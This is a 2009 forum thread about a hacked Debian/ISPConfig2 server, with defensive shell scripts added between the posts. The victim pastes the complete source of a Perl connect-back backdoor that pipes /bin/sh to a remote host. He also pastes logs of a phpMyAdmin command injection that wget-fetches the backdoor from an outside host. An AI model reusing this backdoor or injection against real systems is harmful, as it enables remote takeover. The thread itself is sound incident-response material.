HowtoForge Forums > ISPConfig 2 > General
#1
7th October 2009, 00:30
calcetinconrombosman
ispconfig2 debian perfect server hacked! please help!!

First of all, excuse my English, I'm a Spanish native speaker. Today I tried to log in to the ispconfig2 control panel, and got this:
HTML Code:
Warning: include(../lib/config.inc.php) [function.include]: failed to open stream: No such file or directory in /home/admispconfig/ispconfig/web/login.php on line 30

Warning: include() [function.include]: Failed opening '../lib/config.inc.php' for inclusion (include_path='.:') in /home/admispconfig/ispconfig/web/login.php on line 30

Warning: require_once(login/lib/lang/.lng) [function.require-once]: failed to open stream: No such file or directory in /home/admispconfig/ispconfig/web/login.php on line 31

Fatal error: require_once() [function.require]: Failed opening required 'login/lib/lang/.lng' (include_path='.:') in /home/admispconfig/ispconfig/web/login.php on line 31
So I tried to get into the server by ssh, but it rejected the connection. So I ran to my office as fast as I could, connected a screen and keyboard, and to my surprise, it presented me with this at the command line:

Code:
THENAMEOFMYSERVER login:
It looked very strange to me, but I tried to login anyway and it did nothing. When I typed "root" at the "login" and pressed enter, the cursor just returned to the next line without asking or doing anything else... so then I began to understand. I rebooted the server and logged in by ssh (using putty), this time I could login, and searched for changed files in the last 2 days. Found a new version of ssh under /usr/bin, with 3:41 as the time of change. Also, (../lib/config.inc.php) was deleted. I went through the logs and found this in /var/log/apache2/error.log:

Quote:
[Mon Oct 05 06:25:03 2009] [notice] Graceful restart requested, doing restart
[Mon Oct 05 06:25:04 2009] [notice] mod_python: Creating 8 session mutexes based on 150 max processes and 0 max threads.
[Mon Oct 05 06:25:04 2009] [notice] mod_python: using mutex_directory /tmp
[Mon Oct 05 06:25:04 2009] [notice] Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ruby/1.2.6 Ruby/1.8.$
[Mon Oct 05 06:25:04 2009] [warn] long lost child came home! (pid 12686)
[Tue Oct 06 03:06:24 2009] [error] [client 94.102.211.93] File does not exist: /var/www/sharedip/phpMyAdmin
[Tue Oct 06 03:11:26 2009] [error] [client 94.102.211.93] File does not exist: /var/www/sharedip/pma
[Tue Oct 06 03:13:52 2009] [error] [client 94.102.211.93] File does not exist: /var/www/sharedip/mysql
[Tue Oct 06 03:16:23 2009] [error] [client 94.102.211.93] File does not exist: /var/www/sharedip/pMA
[Tue Oct 06 03:18:50 2009] [error] [client 94.102.211.93] File does not exist: /var/www/sharedip/scripts
[Tue Oct 06 03:21:19 2009] [error] [client 94.102.211.93] File does not exist: /var/www/sharedip/scripts
[Tue Oct 06 03:24:09 2009] [error] [client 94.102.211.93] File does not exist: /usr/share/phpmyadmin/config
--2009-10-06 03:35:40-- http://pistol.clan.su/dc.txt
Resolving pistol.clan.su... 217.199.217.6
Connecting to pistol.clan.su|217.199.217.6|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 726 [text/plain]
Saving to: `/var/tmp/dc.txt'

0K 100% 4.43K=0.2s

2009-10-06 03:35:41 (4.43 KB/s) - `/var/tmp/dc.txt' saved [726/726]

[Tue Oct 06 03:53:51 2009] [error] [client 204.244.11.123] script '/usr/share/phpmyadmin/config.inc.php' not found or unable to stat
[Tue Oct 06 03:53:52 2009] [error] [client 204.244.11.123] script '/usr/share/phpmyadmin/config.inc.php' not found or unable to stat
[Tue Oct 06 09:38:23 2009] [error] [client 194.109.21.230] File does not exist: /var/www/sharedip/proxycheck.txt
[Tue Oct 06 10:54:31 2009] [error] [client MYIPADDRESS] File does not exist: /var/www/sharedip/favicon.ico
[Tue Oct 06 10:54:34 2009] [error] [client MYIPADDRESS] File does not exist: /var/www/sharedip/favicon.ico
[Tue Oct 06 11:07:14 2009] [notice] caught SIGTERM, shutting down
[Tue Oct 06 11:09:05 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/lib/apache2/suexec)
[Tue Oct 06 11:09:07 2009] [notice] mod_python: Creating 8 session mutexes based on 150 max processes and 0 max threads.
[Tue Oct 06 11:09:07 2009] [notice] mod_python: using mutex_directory /tmp
[Tue Oct 06 11:09:07 2009] [notice] Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ruby/1.2.6 Ruby/1.8.$
[Tue Oct 06 11:15:13 2009] [notice] caught SIGTERM, shutting down
The file downloaded got this:

Code:
#!/usr/bin/perl
use Socket;
print "ZeuL's Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
  die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
  open(STDIN,">&SERVER");
  open(STDOUT,">&SERVER");
  open(STDERR,">&SERVER");
  exec {'/bin/sh'} '-bash' . "\0" x 4;
  exit(0);
}
print "[*] Datached\n\n";
/var/log/auth.log got this:
Quote:
Oct 6 03:40:01 MYSERVERNAME CRON[2961]: pam_unix(cron:session): session closed for user www-data
Oct 6 03:41:01 MYSERVERNAME CRON[9643]: pam_unix(cron:session): session opened for user www-data by (uid=0)
Oct 6 03:41:01 MYSERVERNAME CRON[9643]: pam_unix(cron:session): session closed for user www-data
Oct 6 03:41:52 MYSERVERNAME chsh[10083]: changed user `bin' shell to `/bin/bash'
Oct 6 03:41:52 MYSERVERNAME sshd[10099]: error: Bind to port 22 on 0.0.0.0 failed: Address already in use.
Oct 6 03:41:52 MYSERVERNAME sshd[10099]: fatal: Cannot bind any address.
Oct 6 03:41:52 MYSERVERNAME sshd[1849]: Received signal 15; terminating.
Oct 6 03:42:01 MYSERVERNAME CRON[10104]: pam_unix(cron:session): session opened for user www-data by (uid=0)
Oct 6 03:42:01 MYSERVERNAME CRON[10104]: pam_unix(cron:session): session closed for user www-data
and /var/log/kern.log got:

Quote:
Oct 4 06:25:08 MYSERVERNAME kernel: imklog 3.18.6, log source = /proc/kmsg started.
Oct 5 06:25:04 MYSERVERNAME kernel: imklog 3.18.6, log source = /proc/kmsg started.
Oct 6 03:36:01 MYSERVERNAME kernel: [7128496.024928] PPP generic driver version 2.4.2
Oct 6 03:36:01 MYSERVERNAME kernel: [7128496.161469] NET: Registered protocol family 24
Oct 6 03:48:10 MYSERVERNAME kernel: [7129224.770098] syslogd[10394]: segfault at 8 ip 0804bc0b sp bfcc1dd4 error 7 in syslogd[8048000+6000]
Oct 6 03:51:47 MYSERVERNAME kernel: [7129441.780527] syslogd[10634]: segfault at 8 ip 0804bc0b sp bfb18c34 error 7 in syslogd[8048000+6000]
Oct 6 06:25:04 MYSERVERNAME kernel: Kernel logging (proc) stopped.
Oct 6 06:25:04 MYSERVERNAME kernel: imklog 3.18.6, log source = /proc/kmsg started.
Finally, when looking for changed files, I found a file under /usr/share named sshd.sync that got this:
Quote:
incoming : root:MYROOTPASSWORD
I'm pretty f**ked up, I need some directions please. The thing is that the mail server is still going OK, and I recently added 30 new users and half of them are working night and day on an urgent project for the next week, so I get the boot if I turn the server down.

PLEASE PLEASE HELP ME SECURE IT UNTIL THERE IS A CHANCE TO REPLACE IT.
#2
7th October 2009, 03:09
calcetinconrombosman
can i migrate the passwords and accounts?

I forgot to ask if there is some chance to back up all the important files and configs to put them on another "perfect debian server w/ispconfig2" made from scratch?........ that's what I meant by "replacing the server"
#3
7th October 2009, 09:44
damir

Hi,

First, take a deep breath. If you have a backup then it's ok. Don't panic. That's the most important thing to remember. I have had my share of crashed hard drives, servers and god knows what else. It's not a funny feeling but it's not the end of the world.

Was your server patched with the latest security patches? Have you used strong passwords and was your ssh secured?

First thing you should do is to disconnect the machine from the network, then dump / to another hard drive. Because you never know what kind of backdoors, hacks and scripts they left on the server. Only a clean install will remove all that. You need to disconnect from the network because you want to know how and through which security hole they came in. If you are in no hurry then you can, while you are disconnected, go through the server to find out if this was done through a bad web application like Joomla or something similar.

When you are done with that, it depends on the customers, but you should put a new machine up asap. Patch that machine, and install the latest ISPConfig. Then you should restore from backup, but before you do that go through the users' sites to see if there was any web app that had security holes.

Some things to consider:

Secure php and apache
Install mod_security
set ServerSignature off and ServerTokens ProductOnly in apache2.conf
SuEXEC and php through suPHP or fastcgi.
use good firewall
Install snort & ossec
use fail2ban
scan with rkhunter
use strong passwords
disable ROOT logins via SSH
enable publickey authentication and allow your IP's only to connect to machine.
disable services that you don't need.
Monitor your machine

Well, there's a lot you can do, but this is a good start; maybe someone else is gonna fill in.

Last edited by damir; 7th October 2009 at 09:46.
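An added example (not damir's or the thread's own code) that checks a few of the settings in the list above the way I would audit a box before putting it back online: it reads sshd_config the way sshd does (the first occurrence of a keyword wins; Match blocks are ignored here) and apache2.conf the way Apache does (the last occurrence wins), and prints one line per weak value. The sample configs are constructed, not taken from the thread.

```shell
#!/bin/sh
# Audit sshd_config and apache2.conf for the hardening settings listed above.
# Added example with constructed sample configs; not code from the thread.

# sshd: the first occurrence of a keyword is the effective one (keywords are
# case-insensitive). Match blocks are not handled (assumption/limitation).
# Defaults assumed when absent: PermitRootLogin yes, PasswordAuthentication yes,
# PubkeyAuthentication yes.
sshd_value() {  # $1 = file, $2 = keyword, $3 = default when absent
  v=$(awk -v k="$2" 'tolower($1) == tolower(k) { print $2; exit }' "$1")
  printf '%s\n' "${v:-$3}"
}

# Apache: a later directive in the same context overrides an earlier one.
# Defaults assumed when absent: ServerTokens Full, ServerSignature Off.
apache_value() {  # $1 = file, $2 = directive, $3 = default when absent
  v=$(awk -v k="$2" 'tolower($1) == tolower(k) { v = $2 } END { print v }' "$1")
  printf '%s\n' "${v:-$3}"
}

lc() { printf '%s\n' "$1" | tr 'A-Z' 'a-z'; }

# One finding per weak setting on stdout; nothing printed for a hardened file.
audit_sshd() {  # $1 = sshd_config
  [ "$(lc "$(sshd_value "$1" PermitRootLogin yes)")" = no ] ||
    echo "sshd: PermitRootLogin should be no (disable root logins via SSH)"
  [ "$(lc "$(sshd_value "$1" PasswordAuthentication yes)")" = no ] ||
    echo "sshd: PasswordAuthentication should be no (public keys only)"
  [ "$(lc "$(sshd_value "$1" PubkeyAuthentication yes)")" = yes ] ||
    echo "sshd: PubkeyAuthentication should be yes"
  [ -n "$(sshd_value "$1" AllowUsers "")" ] ||
    echo "sshd: no AllowUsers restriction (e.g. AllowUsers admin@203.0.113.10)"
}

audit_apache() {  # $1 = apache2.conf
  case "$(lc "$(apache_value "$1" ServerTokens Full)")" in
    prod|productonly) ;;
    *) echo "apache: ServerTokens should be ProductOnly" ;;
  esac
  [ "$(lc "$(apache_value "$1" ServerSignature Off)")" = off ] ||
    echo "apache: ServerSignature should be Off"
}

# Constructed samples: a weak config (roughly what a stock install leaves
# effective) and a hardened one for each daemon.
WEAK_SSHD=$(mktemp); HARD_SSHD=$(mktemp); WEAK_APACHE=$(mktemp); HARD_APACHE=$(mktemp)
printf 'Port 22\nPermitRootLogin yes\nPasswordAuthentication yes\n' > "$WEAK_SSHD"
printf 'Port 22\nPermitRootLogin no\nPasswordAuthentication no\nPubkeyAuthentication yes\nAllowUsers admin@203.0.113.10\n' > "$HARD_SSHD"
printf 'ServerTokens Full\nServerSignature On\n' > "$WEAK_APACHE"
printf 'ServerTokens ProductOnly\nServerSignature Off\n' > "$HARD_APACHE"

audit_sshd "$WEAK_SSHD"
audit_apache "$WEAK_APACHE"
```

On a real host run `audit_sshd /etc/ssh/sshd_config` and `audit_apache /etc/apache2/apache2.conf`, and remember that on this particular box sshd_config itself shows up in the list of files modified during the attack, so its contents cannot be trusted until the machine is rebuilt.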
#4
7th October 2009, 09:51
calcetinconrombosman
NEED TO ADD NEW USERS.. is there a command line way?

Thanks for the tips Damir, I'm surely going to do a secure install when I get the chance to turn off the server, falling is a way to learn.. a painful one. My site DOESN'T HOST ANYTHING, just mail for ONE SITE, and ONE WEBPAGE (for the same site) that says "under construction" in plain html, and if you look at the first log that I posted you can see that the hacker is trying to get a weak php from the "sharedip" page included in ispconfig, so I really think that the way they got in was from weak php code that I didn't add (because I'm not hosting anything). Also, the site doesn't have roundcube, just using the squirrelmail downloaded for ispconfig2. A link describing the attack is this:

Code:
http://milw0rm.com/papers/260
Is the correct user admispconfig or admispco?? I got the last one as the owner of several folders and can't tell if it was modified or if I just can't read the whole user name when doing "ls -la".

My /etc/passwd file got this, can you tell me if these are normal users for an ispconfig2 install? (I've excluded mail users, nothing wrong in there)
Code:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/bash
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
webmaster:x:1000:1000:admin cefop,,,:/home/webmaster:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
fetchmail:x:104:65534::/var/lib/fetchmail:/bin/false
bind:x:105:106::/var/cache/bind:/bin/false
mysql:x:106:107:MySQL Server,,,:/var/lib/mysql:/bin/false
postfix:x:107:109::/var/spool/postfix:/bin/false
clamav:x:108:111::/var/lib/clamav:/bin/false
amavis:x:109:112:AMaViS system user,,,:/var/lib/amavis:/bin/sh
ntp:x:110:113::/home/ntp:/bin/false
proftpd:x:111:65534::/var/run/proftpd:/bin/false
ftp:x:112:65534::/home/ftp:/bin/false
admispconfig:x:1001:1001:Administrator ISPConfig:/home/admispconfig:/bin/bash
ispconfigend:x:20000:20000::/home/ispconfigend:/usr/sbin/nologin
web1_anonftp:x:12001:12001::/var/www/web1/ftp:/bin/false
filter:x:113:61:Postfix Filters:/var/spool/filter:/bin/sh
If I trace all files and folders modified in those obscure hours, I get this:
Code:
cefopserver:/var/backups# find / -mmin -1500 ! -mmin -1320
/var
/var/lib/phpmyadmin
/var/cache/ldconfig
/var/cache/ldconfig/aux-cache
/var/backups/passwd.bak
/var/backups/shadow.bak
/var/empty
/etc/passwd
/etc/ld.so.cache
/etc/shadow
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/phpmyadmin
/etc/rpm
/usr/share
/usr/share/phpmyadmin
/usr/bin
/usr/bin/ssh
/usr/sbin
/usr/sbin/xntps
/usr/include
/usr/include/hosts.h
/lib
/lib/security
/lib/libproc.so
/sbin
/bin
/home/admispconfig/ispconfig/lib
find: /proc/21294/task/21294/fd/4: No such file or directory
find: /proc/21294/task/21294/fdinfo/4: No such file or directory
find: /proc/21294/fd/4: No such file or directory
find: /proc/21294/fdinfo/4: No such file or directory
/root/ispconfig/scripts/lib
If I list just the files, I get this:
Code:
cefopserver:/var/backups# find / -mmin -1500 ! -mmin -1320 -type f
/var/cache/ldconfig/aux-cache
/var/backups/passwd.bak
/var/backups/shadow.bak
/etc/passwd
/etc/ld.so.cache
/etc/shadow
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/usr/bin/ssh
/usr/sbin/xntps
/usr/include/hosts.h
find: /proc/21352/task/21352/fd/4: No such file or directory
find: /proc/21352/task/21352/fdinfo/4: No such file or directory
find: /proc/21352/fd/4: No such file or directory
find: /proc/21352/fdinfo/4: No such file or directory
I've deleted the downloaded perl file, and am expecting some direction on how to safely remove the corrupted ssh and reinstall a good one. Also please tell me if there is a way to restore the deleted php config files that prevent the ispconfig control panel from working, since I have been asked to modify some account passwords and add some new users. From the directories and files modified above you can tell which directories got deletions, and please point me to where to find info on what those folders should contain. Mail, squirrelmail and DNS are still working ok. Really hoping to hear from anyone, I'll be awake until this gets better....

Last edited by calcetinconrombosman; 7th October 2009 at 10:09.
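An added example, not from the thread, of how to tell whether a file such as /usr/bin/ssh still matches the checksum its Debian package recorded at install time (dpkg keeps those lists in /var/lib/dpkg/info/<package>.md5sums, and `dpkg -S /usr/bin/ssh` names the package). The fake root and md5sums list below are constructed so the script runs anywhere; on the real box the md5sums files and md5sum itself may have been tampered with as well, so run it from a rescue boot or against the package's .deb, and treat a mismatch as confirmation to rebuild rather than something to patch in place.

```shell
#!/bin/sh
# Compare files under ROOT with a dpkg-style md5sums list (one "<md5>  <path>"
# per line, paths relative to /), reporting MISSING and MISMATCH entries.
# Added example with constructed files; not code from the thread or from dpkg.
verify_md5sums() {  # $1 = root directory, $2 = md5sums file
  while read -r sum path; do
    [ -n "$path" ] || continue
    f="$1/$path"
    if [ ! -f "$f" ]; then
      printf 'MISSING  %s\n' "$path"
      continue
    fi
    actual=$(md5sum "$f" | awk '{ print $1 }')
    [ "$actual" = "$sum" ] || printf 'MISMATCH %s\n' "$path"
  done < "$2"
}

# Number of files that differ from the recorded checksums (0 = all match).
count_bad() { verify_md5sums "$1" "$2" | wc -l | tr -d ' '; }

# Constructed fixture: a fake root with two "package" files, checksummed the way
# dpkg records them, then one file replaced and one removed (as in the thread).
ROOT=$(mktemp -d)
mkdir -p "$ROOT/usr/bin"
printf 'pristine ssh client\n' > "$ROOT/usr/bin/ssh"
printf 'pristine scp\n'        > "$ROOT/usr/bin/scp"
(cd "$ROOT" && md5sum usr/bin/ssh usr/bin/scp) > "$ROOT/openssh-client.md5sums"
printf 'replacement ssh\n' > "$ROOT/usr/bin/ssh"   # simulated replaced binary
rm "$ROOT/usr/bin/scp"                              # simulated deleted file

verify_md5sums "$ROOT" "$ROOT/openssh-client.md5sums"
# On a real host the equivalent call is:
#   verify_md5sums / /var/lib/dpkg/info/openssh-client.md5sums
# A mismatching package can be re-fetched with "apt-get install --reinstall",
# which only helps once the machine is trusted again (a clean install, as advised).
```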
#5
7th October 2009, 10:12
damir

If you have no sites on the server, then there are only applications like ISPConfig, PhpMyAdmin and squirrelmail that are installed. Do you have the latest Debian Lenny, all patched up with the latest security patches?
#6
7th October 2009, 10:36
calcetinconrombosman

mmm no. I just installed the "perfect debian lenny server" about four months ago, added squirrelmail, tweaked some things here and there, added the accounts, and left it alone :-( . Didn't apply any security patch to it. If you point me in the right direction, I'll be doing it in no time...

Looking again at "/var/log/apache2/other_vhosts_access.log" I've found the exact command that got the "dc.txt" file onto the server.

/var/log/apache2/other_vhosts_access.log
Code:
localhost:80 204.244.11.123 - - [06/Oct/2009:03:35:40 -0400] "GET //phpmyadmin///config.inc.php?c=cd%20/dev/shm;wget%20http://pistol.clan.su/dc.txt%2059.106.21.54%208080 HTTP/1.1" 200 114 "-" "Conf"
and the next 2 lines (about 20 minutes later) show that they tried something again, but by that time the file config.inc.php was already deleted (not sure about that).

Code:
localhost:80 204.244.11.123 - - [06/Oct/2009:03:53:51 -0400] "GET //phpmyadmin///config.inc.php?c=hostname HTTP/1.1" 404 409 "-" "Conf"
localhost:80 204.244.11.123 - - [06/Oct/2009:03:53:52 -0400] "GET //phpmyadmin///config.inc.php?c=uname%20-a;id HTTP/1.1" 404 409 "-" "Conf"
By the way, the attacks came, coordinated, from Munich, Germany and from Vancouver, Canada. If you get to know them let me know...

Last edited by calcetinconrombosman; 7th October 2009 at 10:43.
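An added example, not from the thread, that pulls requests of this shape out of other_vhosts_access.log and decodes the injected command, so the whole log can be checked instead of only the lines spotted by eye; the status code is printed because a 200 (as in the first line above) means the request reached a script, while the later 404s did not. The log lines are constructed to mirror the ones in this post, using RFC 5737 addresses and an invalid hostname.

```shell
#!/bin/sh
# Find Apache log lines that hit phpMyAdmin's config.inc.php with a "c=" query
# parameter (the command-injection pattern in this thread) and decode the command.
# Added example with constructed log lines; not code from the thread.

# URL-decode stdin (%XX escapes) in plain POSIX awk, so no bash-only printf \x.
urldecode() {
  awk 'BEGIN { hex = "0123456789ABCDEF" }
  function hv(c) { return index(hex, toupper(c)) - 1 }
  {
    s = $0; out = ""
    while ((i = index(s, "%")) > 0 && length(s) >= i + 2) {
      hi = hv(substr(s, i + 1, 1)); lo = hv(substr(s, i + 2, 1))
      if (hi < 0 || lo < 0) { out = out substr(s, 1, i); s = substr(s, i + 1); continue }
      out = out substr(s, 1, i - 1) sprintf("%c", hi * 16 + lo)
      s = substr(s, i + 3)
    }
    print out s
  }'
}

# Fields in other_vhosts_access.log: vhost:port, client, ident, user, [date,
# zone], "method, path, protocol", status, bytes, referer, user-agent.
# Output: one line per hit as  <client> status=<code> cmd=<decoded command>
find_pma_injection() {  # $1 = log file
  grep -E 'config\.inc\.php\?([^ "]*&)?c=' "$1" |
  awk '{ sub(/^.*[?&]c=/, "", $8); sub(/&.*$/, "", $8); print $2, $10, $8 }' |
  while read -r client status cmd; do
    printf '%s status=%s cmd=%s\n' "$client" "$status" "$(printf '%s\n' "$cmd" | urldecode)"
  done
}

# Number of matching requests in a log file.
count_pma_injection() { find_pma_injection "$1" | wc -l | tr -d ' '; }

# Constructed sample modelled on the lines in this post.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
localhost:80 203.0.113.5 - - [06/Oct/2009:03:35:40 -0400] "GET //phpmyadmin///config.inc.php?c=cd%20/dev/shm;wget%20http://example.invalid/dc.txt HTTP/1.1" 200 114 "-" "Conf"
localhost:80 203.0.113.5 - - [06/Oct/2009:03:53:51 -0400] "GET //phpmyadmin///config.inc.php?c=hostname HTTP/1.1" 404 409 "-" "Conf"
localhost:80 192.0.2.9 - - [06/Oct/2009:10:54:31 -0400] "GET /favicon.ico HTTP/1.1" 404 409 "-" "Mozilla/5.0"
localhost:80 192.0.2.9 - - [06/Oct/2009:11:02:17 -0400] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
EOF

find_pma_injection "$SAMPLE_LOG"
```

Run it over the real file with `find_pma_injection /var/log/apache2/other_vhosts_access.log`; a 200 with a non-trivial byte count is the line to worry about, since it shows the injected command was actually executed.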
#7
7th October 2009, 10:45
damir

It looks like they came in through phpmyadmin, which is known for security holes.

Have you installed phpmyadmin through apt-get or did you do manual install? What version of phpmyadmin are you running?

This is important to know so we can isolate the way they came in.

Update your server by issuing the following commands:

Important: Maybe the script has corrupted some system files, which makes upgrading not so easy. It's important that you have a backup of the server.

Code:
apt-get update
apt-get -s upgrade
(-s is for simulating the upgrade process so you can see what packages are going to be installed)

If you are ok with it then issue the following command:

Code:
apt-get upgrade

Last edited by damir; 7th October 2009 at 10:50.
#8
7th October 2009, 16:45
calcetinconrombosman
if ssh is spawned, should I do an apt-get update?

I fell asleep, but I'm back.
I don't have backups.... I know it's the worst thing to do... but surely I'm not going to do it ever again in this life or any other. Is there a way to safely back up the ispconfig databases now and restore them on a fresh install? Is there a way to add new users with maildirs by shell? I don't care now if it's insecure because the mail accounts will be used just for coordination and not for any sensitive data, I've been asked to do it anyway, and then find the way to reinstall the perfect debian server on another machine and migrate the info to keep the mail accounts running.

Now I remember how phpmyadmin came into the "perfect debian server - lenny - ispconfig2".... tired on the second night of installing it, in another of the howtoforge howtos, I followed the initial instructions of the fourth page of the howto for the same debian distro but the ispconfig3 one, so I did install it, and when I realized that I was following the wrong howto, I simply opened the right one and continued from where I was in it.

Thanks for all the help Damir.....
#9
7th October 2009, 19:21
calcetinconrombosman
can I get the accounts working again if I reinstall from scratch?

Is there a safe way to do it? Some tutorial? I know I've been hacked, but I want to try to restore as much as I can to a new fresh install and secure it from the beginning, obviously the files that report some change near the attack hours stay out of the restore, starting with ssh.
#10
7th October 2009, 20:28
damir

Here is an excellent guide on how to move an ispconfig install to a new server.

http://howtoforge.org/forums/showpos...88&postcount=2
All times are GMT +2. The time now is 02:32.

